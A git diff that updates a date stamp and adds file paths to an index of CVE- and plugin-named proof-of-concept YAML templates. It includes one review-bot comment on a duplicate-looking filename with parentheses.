diff --git a/date.txt b/date.txt
index 5f2357c99f..9093ce495f 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20241205
+20241206
diff --git a/poc.txt b/poc.txt
index e7a07433bb..7664237a47 100644
--- a/poc.txt
+++ b/poc.txt
@@ -1051,6 +1051,7 @@
./poc/api/burp-api-detect-812.yaml
./poc/api/burp-api-detect-813.yaml
./poc/api/burp-api-detect.yaml
+./poc/api/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml
./poc/api/cart-rest-api-for-woocommerce-863e46252f4619353ac6e316726d18cc.yaml
./poc/api/cart-rest-api-for-woocommerce.yaml
./poc/api/clickhouse-api-unauth.yaml
@@ -2647,6 +2648,7 @@
./poc/auth/cookiebot.yaml
./poc/auth/cookiehub-aa4595d84974fda5e2ed2c93116d9b1f.yaml
./poc/auth/cookiehub.yaml
+./poc/auth/cookielay-d1709b11e04e7ac0020e84fff5516e5a.yaml
./poc/auth/cookiemonster-b03efd98535cb1491a9c6a9735c7d0eb.yaml
./poc/auth/cookiemonster.yaml
./poc/auth/cookies-and-content-security-policy-01ad7a832bf07caf4715cade7c58a20e.yaml
@@ -4317,6 +4319,7 @@
./poc/auth/mycred-975ce1886c4ca598930d96fa67c4b8de.yaml
./poc/auth/mycred-9c9dcd07bbf18d8b82e863c99230019e.yaml
./poc/auth/mycred-ab15e8f26c6360efdd6040bbe367680e.yaml
+./poc/auth/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml
./poc/auth/mycred-c64e04f4ee706d21106c1d7bac20cb1c.yaml
./poc/auth/mycred-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/auth/mycred-d5c4fcd6192c906be2ff0430f97baff7.yaml
@@ -4592,6 +4595,7 @@
./poc/auth/oracle-people-sign-in-9399.yaml
./poc/auth/oracle-people-sign-in.yaml
./poc/auth/orbiteam-bscw-server-unauthenticated-lfi.yaml
+./poc/auth/otp-login-59e25716cd4187f6ae0041590ffc4112.yaml
./poc/auth/ov3-online-administration-unauthenticated-lfi.yaml
./poc/auth/paloalto-networks-sso.yaml
./poc/auth/panabit-default-login-9437.yaml
@@ -5477,6 +5481,7 @@
./poc/auth/theme-my-login-c0adcf17190736222b76d990855c6100.yaml
./poc/auth/theme-my-login.yaml
./poc/auth/thingsboard-access-token.yaml
+./poc/auth/third-party-cookie-eraser-a95c341c56a938945d517c311512eb15.yaml
./poc/auth/threatq-login-10756.yaml
./poc/auth/threatq-login-10757.yaml
./poc/auth/threatq-login.yaml
@@ -9144,6 +9149,7 @@
./poc/cve/CVE-2011-4804.yaml
./poc/cve/CVE-2011-4926-1779d9229b83a1399466ae14361bbefb.yaml
./poc/cve/CVE-2011-4926-2088.yaml
+./poc/cve/CVE-2011-4926-2089.yaml
./poc/cve/CVE-2011-4926-2091.yaml
./poc/cve/CVE-2011-4926.yaml
./poc/cve/CVE-2011-4955-2c9bc7dc49f1d6049f053f437b9d7049.yaml
@@ -9177,6 +9183,7 @@
./poc/cve/CVE-2011-5181-2112.yaml
./poc/cve/CVE-2011-5181-2116.yaml
./poc/cve/CVE-2011-5181-2117.yaml
+./poc/cve/CVE-2011-5181-2118.yaml
./poc/cve/CVE-2011-5181-8491a0a59b643c19df3fee90d0e2a8a9.yaml
./poc/cve/CVE-2011-5181.yaml
./poc/cve/CVE-2011-5191-51bd4faa48cb8b323facb932108c5e3b.yaml
@@ -11865,6 +11872,7 @@
./poc/cve/CVE-2016-1000134-2679.yaml
./poc/cve/CVE-2016-1000134-f4029376afda7fca93cc3ed29f8a800b.yaml
./poc/cve/CVE-2016-1000134.yaml
+./poc/cve/CVE-2016-1000135-2681.yaml
./poc/cve/CVE-2016-1000135-2683.yaml
./poc/cve/CVE-2016-1000135-2684.yaml
./poc/cve/CVE-2016-1000135-2685.yaml
@@ -13513,6 +13521,7 @@
./poc/cve/CVE-2018-16206-c31676a05fcabd0345611f3ea7f42c3e.yaml
./poc/cve/CVE-2018-16206.yaml
./poc/cve/CVE-2018-16283-0a28c1c4cc9c5b5aca5acd94bd9b3b69.yaml
+./poc/cve/CVE-2018-16283-3362.yaml
./poc/cve/CVE-2018-16283.yaml
./poc/cve/CVE-2018-16285-c3c8a5c2988068028f0e9e257661ab03.yaml
./poc/cve/CVE-2018-16285.yaml
@@ -13803,6 +13812,7 @@
./poc/cve/CVE-2018-3760.yaml
./poc/cve/CVE-2018-3810-3554.yaml
./poc/cve/CVE-2018-3810-3555.yaml
+./poc/cve/CVE-2018-3810-3557.yaml
./poc/cve/CVE-2018-3810-6de071448d5adb9d4c6352281eb7005f.yaml
./poc/cve/CVE-2018-3810.yaml
./poc/cve/CVE-2018-3811-385c337e25130e5d61f4f32a2f113d5e.yaml
@@ -16193,6 +16203,7 @@
./poc/cve/CVE-2020-8658-0284295106abbcc85275b72b5aa54300.yaml
./poc/cve/CVE-2020-8658.yaml
./poc/cve/CVE-2020-8771-5336.yaml
+./poc/cve/CVE-2020-8771-5339.yaml
./poc/cve/CVE-2020-8771-69608ea8c92bdaaf7f1a2b586a50b63f.yaml
./poc/cve/CVE-2020-8771.yaml
./poc/cve/CVE-2020-8772 (copy 1).yaml
@@ -16618,6 +16629,7 @@
./poc/cve/CVE-2021-24225-bcf995267e90e3cc63f9a02bf6b87efc.yaml
./poc/cve/CVE-2021-24225.yaml
./poc/cve/CVE-2021-24226-5645.yaml
+./poc/cve/CVE-2021-24226-5648.yaml
./poc/cve/CVE-2021-24226-ce003cda2a7fdf989943ff2a7c0fe217.yaml
./poc/cve/CVE-2021-24226.yaml
./poc/cve/CVE-2021-24227-656a26809b7464f324229a4abc1031bd.yaml
@@ -16723,6 +16735,7 @@
./poc/cve/CVE-2021-24273-10f609f202db10a6a9875caf578e9466.yaml
./poc/cve/CVE-2021-24273.yaml
./poc/cve/CVE-2021-24274-5658.yaml
+./poc/cve/CVE-2021-24274-5660.yaml
./poc/cve/CVE-2021-24274-c0de31a7825ac9622f57009054aa149c.yaml
./poc/cve/CVE-2021-24274.yaml
./poc/cve/CVE-2021-24275-5661.yaml
@@ -16788,6 +16801,7 @@
./poc/cve/CVE-2021-24297-22f032ffb815dcd080e766b46019670a.yaml
./poc/cve/CVE-2021-24297.yaml
./poc/cve/CVE-2021-24298-3527710bdd7422152bd92d39233e4083.yaml
+./poc/cve/CVE-2021-24298-5686.yaml
./poc/cve/CVE-2021-24298-5687.yaml
./poc/cve/CVE-2021-24298-5688.yaml
./poc/cve/CVE-2021-24298.yaml
@@ -16828,6 +16842,7 @@
./poc/cve/CVE-2021-24316-2813a1d60b58f7217403cc4e686b51f8.yaml
./poc/cve/CVE-2021-24316-5689.yaml
./poc/cve/CVE-2021-24316-5691.yaml
+./poc/cve/CVE-2021-24316-5695.yaml
./poc/cve/CVE-2021-24316-d168751b238f28a1a68263abeb6f4c7a.yaml
./poc/cve/CVE-2021-24316.yaml
./poc/cve/CVE-2021-24317-dfd9bd55d8a4d4cc599169686f7f08ba.yaml
@@ -17242,6 +17257,7 @@
./poc/cve/CVE-2021-24509-9e53895ae638a7e8cfc6fe7e1599f34c.yaml
./poc/cve/CVE-2021-24509.yaml
./poc/cve/CVE-2021-24510-5758.yaml
+./poc/cve/CVE-2021-24510-5759.yaml
./poc/cve/CVE-2021-24510-6c28986cc17c5644f049342400ae6c18.yaml
./poc/cve/CVE-2021-24510.yaml
./poc/cve/CVE-2021-24511-bb2ec5de3b1fb9084a4e4bc2f40c53b6.yaml
@@ -17899,6 +17915,7 @@
./poc/cve/CVE-2021-24838-193631008f48769f14ce31f773b10581.yaml
./poc/cve/CVE-2021-24838-5767.yaml
./poc/cve/CVE-2021-24838-5768.yaml
+./poc/cve/CVE-2021-24838-5769.yaml
./poc/cve/CVE-2021-24838.yaml
./poc/cve/CVE-2021-24839-b54cf1fedbcdd93956474a85392276cb.yaml
./poc/cve/CVE-2021-24839.yaml
@@ -20580,6 +20597,7 @@
./poc/cve/CVE-2022-1605.yaml
./poc/cve/CVE-2022-1608-7d106179563c4124306bf651834445b6.yaml
./poc/cve/CVE-2022-1608.yaml
+./poc/cve/CVE-2022-1609(1).yaml
./poc/cve/CVE-2022-1609-b8b166aada92410fb1f2f9b2f53918ca.yaml
./poc/cve/CVE-2022-1609.yaml
./poc/cve/CVE-2022-1610-fff8ab2c8c6bb0ed58b0b33dc7b8e8cb.yaml
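Review bot: The added entry `./poc/cve/CVE-2022-1609(1).yaml` breaks the naming used by its neighbours in this hunk (`CVE-2022-1609.yaml` and `CVE-2022-1609-b8b166aada92410fb1f2f9b2f53918ca.yaml`). The `(1)` suffix looks like a duplicate-download artifact, so this may be a copy of a template that is already indexed; comparing file contents before adding it would confirm that. Parentheses are also shell metacharacters, so if poc.txt is ever fed unquoted to a shell loop or `xargs`, this line will error out or be mis-split. I would rename it to the hash-suffixed form, e.g. `./poc/cve/CVE-2022-1609-<content-hash>.yaml`, and have any consumer of the list quote each path.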
@@ -26266,6 +26284,7 @@
./poc/cve/CVE-2023-2414.yaml
./poc/cve/CVE-2023-2415-5de376ba13565bd67530c98131e13dd3.yaml
./poc/cve/CVE-2023-2415.yaml
+./poc/cve/CVE-2023-2416-b6e308449e56a72318f3547f11c5f544.yaml
./poc/cve/CVE-2023-2416-d2ec2eed287e58f90d3c86cbb07595d1.yaml
./poc/cve/CVE-2023-2416.yaml
./poc/cve/CVE-2023-24243.yaml
@@ -34210,6 +34229,7 @@
./poc/cve/CVE-2024-0678.yaml
./poc/cve/CVE-2024-0679-ee501df61dac24ab9c37a22889e58e87.yaml
./poc/cve/CVE-2024-0679.yaml
+./poc/cve/CVE-2024-0680-0ba13fa9274659992e0f27178c53ade5.yaml
./poc/cve/CVE-2024-0680-9313796b24a8fcfd217ef8d1a90a8725.yaml
./poc/cve/CVE-2024-0680.yaml
./poc/cve/CVE-2024-0681-133acab13d9998d70956a30cfed544d4.yaml
@@ -34481,6 +34501,7 @@
./poc/cve/CVE-2024-10055-a7567bb6df1c6f932e81f3fa194c2a29.yaml
./poc/cve/CVE-2024-10055.yaml
./poc/cve/CVE-2024-10056-a8d2a1d47ca5a0c2f053a977af04fb8c.yaml
+./poc/cve/CVE-2024-10056.yaml
./poc/cve/CVE-2024-10057-3619138af4b1755697a61cf7520ca3e3.yaml
./poc/cve/CVE-2024-10057.yaml
./poc/cve/CVE-2024-10078-ac3355172629b828c0c05e8735d48816.yaml
@@ -34535,6 +34556,7 @@
./poc/cve/CVE-2024-10177-cd099857e17e9d5daf937c4caff0288e.yaml
./poc/cve/CVE-2024-10177.yaml
./poc/cve/CVE-2024-10178-8d00ef32d8cfb13b51bc10bd4d6d2d45.yaml
+./poc/cve/CVE-2024-10178.yaml
./poc/cve/CVE-2024-10179-99e78b7be5cf73a1cef31eb112268c96.yaml
./poc/cve/CVE-2024-10179.yaml
./poc/cve/CVE-2024-10180-cda9906f3b0afcef720a2edb145ba669.yaml
@@ -34566,6 +34588,7 @@
./poc/cve/CVE-2024-10233.yaml
./poc/cve/CVE-2024-10245-36e3bfba2394d4b95bdad2a14d8741f6.yaml
./poc/cve/CVE-2024-10245.yaml
+./poc/cve/CVE-2024-10247-7e9248f7d08a8c804a85ce87492c023b.yaml
./poc/cve/CVE-2024-10250-381303a6df453508271ce4a14d6f5e15.yaml
./poc/cve/CVE-2024-10250.yaml
./poc/cve/CVE-2024-10260-0f500cb04d1d9154639ea4ef28029202.yaml
@@ -34603,6 +34626,7 @@
./poc/cve/CVE-2024-10316.yaml
./poc/cve/CVE-2024-10319-5c0b2e6241c7af29d146faf4b6581f3b.yaml
./poc/cve/CVE-2024-10319.yaml
+./poc/cve/CVE-2024-10320-f49b48a1fa24c03d49f1d0779bc05074.yaml
./poc/cve/CVE-2024-10323-3b68b4ce641de125944f01ebe9a88071.yaml
./poc/cve/CVE-2024-10323.yaml
./poc/cve/CVE-2024-10325-402ce314182729d314273aac0547c13d.yaml
@@ -34692,6 +34716,7 @@
./poc/cve/CVE-2024-1051.yaml
./poc/cve/CVE-2024-10515-5613c1285c13db3e8e7567a1d6eaba45.yaml
./poc/cve/CVE-2024-10515.yaml
+./poc/cve/CVE-2024-10516-90da3b799283fae5783fef07a67bdeef.yaml
./poc/cve/CVE-2024-10519-e4ed2d5cfcede1f54bb2e43cfa2269d7.yaml
./poc/cve/CVE-2024-10519.yaml
./poc/cve/CVE-2024-10520-e565e8010591b8cf25b393d5f18f3d3c.yaml
@@ -34751,6 +34776,7 @@
./poc/cve/CVE-2024-10577-03e59e27ad2ae9ca6f8945bd8581720d.yaml
./poc/cve/CVE-2024-10577-c910dfbedc2df85177b53310160d01a7.yaml
./poc/cve/CVE-2024-10577.yaml
+./poc/cve/CVE-2024-10578-6bc0121b7a6d48f214b8939cb1f78d29.yaml
./poc/cve/CVE-2024-10579-3b42e924fd20aca47fa65689d369e300.yaml
./poc/cve/CVE-2024-10579.yaml
./poc/cve/CVE-2024-1058-ee29f13d5975fd520360e5ea7be92c39.yaml
@@ -34831,6 +34857,7 @@
./poc/cve/CVE-2024-10677.yaml
./poc/cve/CVE-2024-1068-9cafdd7123cc13ec1ddd7f5534904f5e.yaml
./poc/cve/CVE-2024-1068.yaml
+./poc/cve/CVE-2024-10681-074ccd2e143d120107ec916d21cfe73a.yaml
./poc/cve/CVE-2024-10682-845790654070752f55040438702d276d.yaml
./poc/cve/CVE-2024-10682-99be99ab3c687f004931a9abe6a2c2f0.yaml
./poc/cve/CVE-2024-10682.yaml
@@ -34846,8 +34873,10 @@
./poc/cve/CVE-2024-10687.yaml
./poc/cve/CVE-2024-10688-4e865d55bfaf7ccff8ab4229b44e4c7b.yaml
./poc/cve/CVE-2024-10688.yaml
+./poc/cve/CVE-2024-10689-ec644bcff6b8252f58e7ce0b4795467c.yaml
./poc/cve/CVE-2024-1069-eade4f165a3dd4a95074ea430cf7d5a1.yaml
./poc/cve/CVE-2024-1069.yaml
+./poc/cve/CVE-2024-10692-c75c741c420e4c515c59f2646be4e222.yaml
./poc/cve/CVE-2024-10693-c432d0b08f287a25140732c41d4a1ed1.yaml
./poc/cve/CVE-2024-10693.yaml
./poc/cve/CVE-2024-10695-d3f51a21505172dd3b75517abc1cda80.yaml
@@ -34888,6 +34917,7 @@
./poc/cve/CVE-2024-10770-c34a4a3efec7f5f02bdebaace96e792d.yaml
./poc/cve/CVE-2024-10770.yaml
./poc/cve/CVE-2024-10777-3d0f2c41b4182831f7340ab1eb913016.yaml
+./poc/cve/CVE-2024-10777.yaml
./poc/cve/CVE-2024-10778-797064adc3334f08c3fbb1275f7b3b47.yaml
./poc/cve/CVE-2024-10778-fd80b84e6e4bfedee7b8d137c9c72b1b.yaml
./poc/cve/CVE-2024-10778.yaml
@@ -34954,9 +34984,12 @@
./poc/cve/CVE-2024-1083.yaml
./poc/cve/CVE-2024-10832-08cd101251aa1a9d6856998524059503.yaml
./poc/cve/CVE-2024-10832.yaml
+./poc/cve/CVE-2024-10836-e5372e893ae8325e3b297cc93a19837f.yaml
./poc/cve/CVE-2024-10837-822bdf929bf75cae072305d22ba83f9d.yaml
./poc/cve/CVE-2024-10837.yaml
./poc/cve/CVE-2024-10848-7435d35ca01d98267edea517a3f5f67d.yaml
+./poc/cve/CVE-2024-10848.yaml
+./poc/cve/CVE-2024-10849-c4f62162d556d3b337dc88f33abf0608.yaml
./poc/cve/CVE-2024-10850-1086df4e1d6f59239e6e41cb5264dfd9.yaml
./poc/cve/CVE-2024-10850-1914522a12aa125c7663504eb5d5805e.yaml
./poc/cve/CVE-2024-10850.yaml
@@ -34986,6 +35019,7 @@
./poc/cve/CVE-2024-10872.yaml
./poc/cve/CVE-2024-10873-4dd27e8fb81cdeee3e70714a8ad3eb71.yaml
./poc/cve/CVE-2024-10873.yaml
+./poc/cve/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml
./poc/cve/CVE-2024-10874-f04e19edf59553c6a738cb353e8b2d2f.yaml
./poc/cve/CVE-2024-10874.yaml
./poc/cve/CVE-2024-10875-45b6168ef90063fd32579a018f9eb47d.yaml
@@ -34996,11 +35030,13 @@
./poc/cve/CVE-2024-10877.yaml
./poc/cve/CVE-2024-10878-2a6958b657c7efaf0d338a4aea9db038.yaml
./poc/cve/CVE-2024-10878.yaml
+./poc/cve/CVE-2024-10879-fdafc38df20050c33f2864a1f7138f44.yaml
./poc/cve/CVE-2024-1088-58bbbe61468292a1146bbabf2501df14.yaml
./poc/cve/CVE-2024-1088.yaml
./poc/cve/CVE-2024-10880-59c0038e0af4d28442c891a27a66f569.yaml
./poc/cve/CVE-2024-10880.yaml
./poc/cve/CVE-2024-10881-596695d2d6cc01668d710d28f9523f24.yaml
+./poc/cve/CVE-2024-10881.yaml
./poc/cve/CVE-2024-10882-e797660f97ef668cb301cb3b9715bd4a.yaml
./poc/cve/CVE-2024-10882.yaml
./poc/cve/CVE-2024-10883-a21949176ab6e3c686e7a07e748a996d.yaml
@@ -35032,6 +35068,7 @@
./poc/cve/CVE-2024-1090.yaml
./poc/cve/CVE-2024-10900-15161f64578c8a72d2a1b43a0155d517.yaml
./poc/cve/CVE-2024-10900.yaml
+./poc/cve/CVE-2024-10909-308c66fb506ba01c372d73eaeb9b223a.yaml
./poc/cve/CVE-2024-1091-cebf822ed68805638f7571c8df635233.yaml
./poc/cve/CVE-2024-1091.yaml
./poc/cve/CVE-2024-10913-293ddeaa8a2577b31fabdbc30afdd8d5.yaml
@@ -35046,6 +35083,7 @@
./poc/cve/CVE-2024-1093-7c034f664d389dd1d4714fd38e3096f8.yaml
./poc/cve/CVE-2024-1093.yaml
./poc/cve/CVE-2024-10937-e65765a33d97e7492f011b63b4951ffc.yaml
+./poc/cve/CVE-2024-10937.yaml
./poc/cve/CVE-2024-1094-28bbaf5febf22938e52d5e0ad45af461.yaml
./poc/cve/CVE-2024-1094.yaml
./poc/cve/CVE-2024-1095-741eaa5507c75edbe90bc3ba4e40e5a9.yaml
@@ -35054,6 +35092,7 @@
./poc/cve/CVE-2024-10952.yaml
./poc/cve/CVE-2024-10958-b9e22eaad7c9ca71f94e8afa6dc3ff9c.yaml
./poc/cve/CVE-2024-10958.yaml
+./poc/cve/CVE-2024-10961-60fb90d65f9868b90bab1ea437eb89b3.yaml
./poc/cve/CVE-2024-10961-c22c374f4ffe67db892c953e4cf45c93.yaml
./poc/cve/CVE-2024-10961.yaml
./poc/cve/CVE-2024-10962-b5d6c73fa07a42d3299578c2a0d3f408.yaml
@@ -35119,6 +35158,7 @@
./poc/cve/CVE-2024-11150.yaml
./poc/cve/CVE-2024-11154-529b37d71d1c447f23821a8d5e5c09ec.yaml
./poc/cve/CVE-2024-11154.yaml
+./poc/cve/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml
./poc/cve/CVE-2024-11179-1e778ca562fc16e9c8b2cbe854f17d8d.yaml
./poc/cve/CVE-2024-11179.yaml
./poc/cve/CVE-2024-1118-d2488e79cdb18e5fa6f4b114e5fd1973.yaml
@@ -35144,6 +35184,7 @@
./poc/cve/CVE-2024-1120.yaml
./poc/cve/CVE-2024-11200-2ed75e0618faa276dda0258a435ea9ca.yaml
./poc/cve/CVE-2024-11200.yaml
+./poc/cve/CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19.yaml
./poc/cve/CVE-2024-11202-32578cc7038a4c251703cadebc084ad8.yaml
./poc/cve/CVE-2024-11202-52e2ce4340581c57296ec17159d2460d.yaml
./poc/cve/CVE-2024-11202-77caff140b8bc5be998ac80c9386051c.yaml
@@ -35154,6 +35195,7 @@
./poc/cve/CVE-2024-11202.yaml
./poc/cve/CVE-2024-11203-1cd59b8fc753c6adcd4897a2127aa88d.yaml
./poc/cve/CVE-2024-11203.yaml
+./poc/cve/CVE-2024-11204-f87aa22c9bcd426fec72b8003f96482e.yaml
./poc/cve/CVE-2024-1121-f9acdd7e5d4400d7ac2f5c1f64969230.yaml
./poc/cve/CVE-2024-1121.yaml
./poc/cve/CVE-2024-11219-048b6dca7f14c30180d7d2d9e7d023ad.yaml
@@ -35188,19 +35230,24 @@
./poc/cve/CVE-2024-11265.yaml
./poc/cve/CVE-2024-1127-96dba372bfefb2c18f635a1075e27756.yaml
./poc/cve/CVE-2024-1127.yaml
+./poc/cve/CVE-2024-11276-1c24f81d5eab39f4ec1228eaffb6a4d3.yaml
./poc/cve/CVE-2024-11277-371669e41b1bdbea10af14d85581448c.yaml
./poc/cve/CVE-2024-11277.yaml
./poc/cve/CVE-2024-11278-f2f3b28a1bbcb829b720cfe84f4bb1fb.yaml
./poc/cve/CVE-2024-11278.yaml
./poc/cve/CVE-2024-1128-67d8835f2e0e8ac11d097612ad9e363c.yaml
./poc/cve/CVE-2024-1128.yaml
+./poc/cve/CVE-2024-11289-4184d5eaa04495a4f6cb218a2896f8eb.yaml
./poc/cve/CVE-2024-1129-0aba491c9fa777fb284efdb308d0b368.yaml
./poc/cve/CVE-2024-1129.yaml
+./poc/cve/CVE-2024-11292-850b0e5aa453cf8d597f2fe778aca46b.yaml
./poc/cve/CVE-2024-11293-445cfc68523ff32c33fa3e493bbbe08c.yaml
./poc/cve/CVE-2024-11293.yaml
./poc/cve/CVE-2024-1130-098b26182013dbcd4e8583ec0a56cb16.yaml
./poc/cve/CVE-2024-1130.yaml
+./poc/cve/CVE-2024-11323-93b3a3a19c4e461d1bd3833545daae0f.yaml
./poc/cve/CVE-2024-11324-744eea132cf5114313c8cf238c08e606.yaml
+./poc/cve/CVE-2024-11324.yaml
./poc/cve/CVE-2024-11325-316ac125b380ef0e67ba0167790d2d3b.yaml
./poc/cve/CVE-2024-11325.yaml
./poc/cve/CVE-2024-11326-0c8fabfd859db33f6ff486f4e38a0506.yaml
@@ -35215,11 +35262,15 @@
./poc/cve/CVE-2024-11333.yaml
./poc/cve/CVE-2024-11334-0b8da3e1689c4970bc8a08684dc2b879.yaml
./poc/cve/CVE-2024-11334.yaml
+./poc/cve/CVE-2024-11336-3e061f8446314ee414179038a3da58ff.yaml
+./poc/cve/CVE-2024-11339-5fa325846534729a9ee06c7b2d86ccc1.yaml
./poc/cve/CVE-2024-1134-80f4a43eaea90aa0c6452abac73a271e.yaml
./poc/cve/CVE-2024-1134.yaml
./poc/cve/CVE-2024-11341-d9c0a662afec84fc95603ed54f2aec86.yaml
+./poc/cve/CVE-2024-11341.yaml
./poc/cve/CVE-2024-11342-e05ffc71141aa17d097258d0a66a00da.yaml
./poc/cve/CVE-2024-11342.yaml
+./poc/cve/CVE-2024-11352-2956a03392350547f722d5c5b1052818.yaml
./poc/cve/CVE-2024-11354-0e62ca18f9bdb0611f368a7276263f85.yaml
./poc/cve/CVE-2024-11354.yaml
./poc/cve/CVE-2024-11355-edf82e64900042596ef0c5f92c74100e.yaml
@@ -35237,11 +35288,13 @@
./poc/cve/CVE-2024-11365.yaml
./poc/cve/CVE-2024-11366-cc7c5723ad039e93a1f894e0ec9c21a6.yaml
./poc/cve/CVE-2024-11366.yaml
+./poc/cve/CVE-2024-11368-4f78bcb719a028575fa2e8dc0ead82a6.yaml
./poc/cve/CVE-2024-11370-8905f30acaa5202d5d378bf4d5583236.yaml
./poc/cve/CVE-2024-11370-b85fbeb5ce3fb349473e622007a9f53a.yaml
./poc/cve/CVE-2024-11370.yaml
./poc/cve/CVE-2024-11371-95a048e99cf0968d3759cd47fec02e09.yaml
./poc/cve/CVE-2024-11371.yaml
+./poc/cve/CVE-2024-11379-039fa25f860d0b73f90d1c2ba7698bfc.yaml
./poc/cve/CVE-2024-11381-4ba6eeaab054e0e01702e7251bb00372.yaml
./poc/cve/CVE-2024-11381.yaml
./poc/cve/CVE-2024-11385-43829d07561569d5ecaceb7ea47ba97c.yaml
@@ -35273,6 +35326,7 @@
./poc/cve/CVE-2024-11418-fabf33e92d70128a9b53e9bacfb521c3.yaml
./poc/cve/CVE-2024-11418.yaml
./poc/cve/CVE-2024-11420-2826e6328a5500d4faa1dc190ffc98cc.yaml
+./poc/cve/CVE-2024-11420.yaml
./poc/cve/CVE-2024-11424-1220902dc85195463b8e6b1e1cc1470c.yaml
./poc/cve/CVE-2024-11424.yaml
./poc/cve/CVE-2024-11426-ada6fe273d3c0447cca6a4f9c17bc628.yaml
@@ -35280,6 +35334,7 @@
./poc/cve/CVE-2024-11428-f836c627b4521637a2e87c9552fd2a57.yaml
./poc/cve/CVE-2024-11428.yaml
./poc/cve/CVE-2024-11429-f2942bb3824b4d9b7780f8fbd0f14593.yaml
+./poc/cve/CVE-2024-11429.yaml
./poc/cve/CVE-2024-11431-28e640b1d4d500562eca3cb2f0498909.yaml
./poc/cve/CVE-2024-11431.yaml
./poc/cve/CVE-2024-11432-5ab33a7cf49791cb848b0e8a8b92d04f.yaml
@@ -35291,10 +35346,12 @@
./poc/cve/CVE-2024-11438.yaml
./poc/cve/CVE-2024-11440-b26a27e98ac4778bf1db64f0d89b26d0.yaml
./poc/cve/CVE-2024-11440.yaml
+./poc/cve/CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef.yaml
./poc/cve/CVE-2024-11446-3888215e68990f5f74ea66a863aea2dd.yaml
./poc/cve/CVE-2024-11446.yaml
./poc/cve/CVE-2024-11447-053ad392530025b6e52689e2d755cb20.yaml
./poc/cve/CVE-2024-11447.yaml
+./poc/cve/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml
./poc/cve/CVE-2024-11453-fa7409a899cdcce4323f76f911032569.yaml
./poc/cve/CVE-2024-11453.yaml
./poc/cve/CVE-2024-11455-20245b95e832be32aa78c5dcdb250fbb.yaml
@@ -35304,6 +35361,7 @@
./poc/cve/CVE-2024-11456.yaml
./poc/cve/CVE-2024-11458-06c2883fbed5c08d970a9ed931a3e19e.yaml
./poc/cve/CVE-2024-11458.yaml
+./poc/cve/CVE-2024-11460-54390097dc3ed52a0207a2b2c6c9909f.yaml
./poc/cve/CVE-2024-11461-79c81f7450c8a8210454f180a585b023.yaml
./poc/cve/CVE-2024-11461.yaml
./poc/cve/CVE-2024-11463-0bf104abede23adeb8af80d1e15ce8a5.yaml
@@ -35314,6 +35372,7 @@
./poc/cve/CVE-2024-1157.yaml
./poc/cve/CVE-2024-1158-c524eecd9e35e784bb852f087dadba65.yaml
./poc/cve/CVE-2024-1158.yaml
+./poc/cve/CVE-2024-11585-2cea61d12b0cef27d38be3d7af3bdcdf.yaml
./poc/cve/CVE-2024-1159-e1be592d0538ff54babfcfb35ba5c078.yaml
./poc/cve/CVE-2024-1159.yaml
./poc/cve/CVE-2024-1160-6f8b52f63a7418371b1b3b9ca6d3a448.yaml
@@ -35341,6 +35400,7 @@
./poc/cve/CVE-2024-11684.yaml
./poc/cve/CVE-2024-11685-a8b92c4479bf790f7f0a4e95c7b55344.yaml
./poc/cve/CVE-2024-11685.yaml
+./poc/cve/CVE-2024-11687-ce28bfd71dd54c3c29603bf27368d6c6.yaml
./poc/cve/CVE-2024-1169-007e07b24673895c34505297aed33632.yaml
./poc/cve/CVE-2024-1169.yaml
./poc/cve/CVE-2024-1170-319ccaea8169c279380313a5b41bae50.yaml
@@ -35351,8 +35411,11 @@
./poc/cve/CVE-2024-1171.yaml
./poc/cve/CVE-2024-1172-39dfeb3662991e9d246c7171e032fdd6.yaml
./poc/cve/CVE-2024-1172.yaml
+./poc/cve/CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7.yaml
+./poc/cve/CVE-2024-11729-fc3745f8e039decbc81308be45aacd79.yaml
./poc/cve/CVE-2024-1173-9e9606db29cc691b1619adba347c82df.yaml
./poc/cve/CVE-2024-1173.yaml
+./poc/cve/CVE-2024-11730-2e1143d8e0f261dcfb3953128e8fb707.yaml
./poc/cve/CVE-2024-11732-6300c1dae27be21acd061d5288a24196.yaml
./poc/cve/CVE-2024-11732.yaml
./poc/cve/CVE-2024-11747-62f3cf7911a4e9abbe89a873183d1c75.yaml
@@ -35370,6 +35433,7 @@
./poc/cve/CVE-2024-1177-44b068407f4a1063af5594e6bad17afb.yaml
./poc/cve/CVE-2024-1177.yaml
./poc/cve/CVE-2024-11779-dc5a2e8f9e2fe37de6208069b0a261fc.yaml
+./poc/cve/CVE-2024-11779.yaml
./poc/cve/CVE-2024-1178-26b664c2c5e2ce23e9059d41408b3b04.yaml
./poc/cve/CVE-2024-1178.yaml
./poc/cve/CVE-2024-11782-14c12bf1c0b93e64d33c585eee3be338.yaml
@@ -35388,6 +35452,7 @@
./poc/cve/CVE-2024-11813.yaml
./poc/cve/CVE-2024-11814-d146dcbc7cba6beb9447aebeae90eb88.yaml
./poc/cve/CVE-2024-11814.yaml
+./poc/cve/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml
./poc/cve/CVE-2024-1183.yaml
./poc/cve/CVE-2024-11844-07ec12dfcaf6ca937ccce1eaaff746ba.yaml
./poc/cve/CVE-2024-11844.yaml
@@ -35413,6 +35478,9 @@
./poc/cve/CVE-2024-11935.yaml
./poc/cve/CVE-2024-11952-16ad33d112d4e8604b5e9b540af90fd8.yaml
./poc/cve/CVE-2024-11952.yaml
+./poc/cve/CVE-2024-12003-f77c04413b23540455a2432d7e006cc4.yaml
+./poc/cve/CVE-2024-12027-ac20a46df6a7bc7dc3fb76e961264ae6.yaml
+./poc/cve/CVE-2024-12028-743f7fbc736d510f8f41d855806fd00b.yaml
./poc/cve/CVE-2024-1203-cede147cec5ebe1dea014170dd370ad1.yaml
./poc/cve/CVE-2024-1203.yaml
./poc/cve/CVE-2024-1204-71ef2dafaa4ce9d17d3dff19cd522221.yaml
@@ -35421,6 +35489,7 @@
./poc/cve/CVE-2024-1205.yaml
./poc/cve/CVE-2024-1206-6b0dd76adaa2c8efc4ee8d32327a4705.yaml
./poc/cve/CVE-2024-1206.yaml
